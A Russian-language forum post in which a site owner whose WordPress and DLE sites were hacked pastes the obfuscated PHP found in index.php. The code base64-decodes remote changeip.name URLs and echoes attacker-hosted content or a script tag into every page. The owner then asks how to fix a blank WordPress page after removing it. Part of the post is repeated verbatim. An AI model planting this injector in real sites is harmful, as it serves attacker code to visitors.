Sarpedon
Постоялец
- Регистрация
- 23 Фев 2012
- Сообщения
- 321
- Реакции
- 136
- Автор темы
- #1
На сайт залили вирус. Точнее не на один сайт, а на 4, ну да ладно 
Вирус был закодирован, в html выглядел как-то так (если кому интересно) :
html
Помогите криворукому, пожалуйста))
Вирус был закодирован, в html выглядел как-то так (если кому интересно) :html
<script src="Для просмотра ссылки Войди или Зарегистрируйся"></script> [/spoil]
шифровка
[spoil]GzipOut ();
function sql2_safe($in) {
$rtn = base64_decode($in);
return $rtn;
}
function collectnewss() {
$get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
$content = @file_get_contents($get);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else
echo $content;
}
collectnewss ();
?> [/spoil]
Теперь о проблеме с wp. Вирус размещался в index.php. Сайты на ДЛЕ и ВП. С ДЛЕ всё ок прошло, я радостный взялся с ВП. Зашел в корневой каталог, нарыл там индекс и удалил зловредный код. Только по-моему, вместе с ним я еще что-то захватил или и вовсе его перепутал. Теперь как захожу на сайт, показывает просто белую страницу. На какую бы страницу не зашел - белое полотно. Вопрос: че делать то? Бэкапов я не делал, откатиться не могу. Может кто-то знает, что пишут обычно в index.php на ВП? Там кода немного было. Я удалил почти половину из того что там было. Вот другая половина:
[spoil]
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
шифровка
[spoil]GzipOut ();
function sql2_safe($in) {
$rtn = base64_decode($in);
return $rtn;
}
function collectnewss() {
$get = sql2_safe("aHR0cDovL2N0cmxzaS5jaGFuZ2VpcC5uYW1lOjg4OC9zY3JpcHQuaHRtbA==");
$content = @file_get_contents($get);
if (!$content)
echo sql2_safe("PHNjcmlwdCBzcmM9Imh0dHA6Ly9mZWVsdGhlc2FtZS5jaGFuZ2VpcC5uYW1lL3JzaXplLmpzIj48L3NjcmlwdD4=");
else
echo $content;
}
collectnewss ();
?> [/spoil]
Теперь о проблеме с wp. Вирус размещался в index.php. Сайты на ДЛЕ и ВП. С ДЛЕ всё ок прошло, я радостный взялся с ВП. Зашел в корневой каталог, нарыл там индекс и удалил зловредный код. Только по-моему, вместе с ним я еще что-то захватил или и вовсе его перепутал. Теперь как захожу на сайт, показывает просто белую страницу. На какую бы страницу не зашел - белое полотно. Вопрос: че делать то? Бэкапов я не делал, откатиться не могу. Может кто-то знает, что пишут обычно в index.php на ВП? Там кода немного было. Я удалил почти половину из того что там было. Вот другая половина:
[spoil]
<?php
/**
* Front to the WordPress application. This file doesn't do anything, but loads
* wp-blog-header.php which does and tells WordPress to load the theme.
*
* @package WordPress
*/
/**
* Tells WordPress to load the WordPress theme and output it.
*
* @var bool
*/
define('WP_USE_THEMES', true);
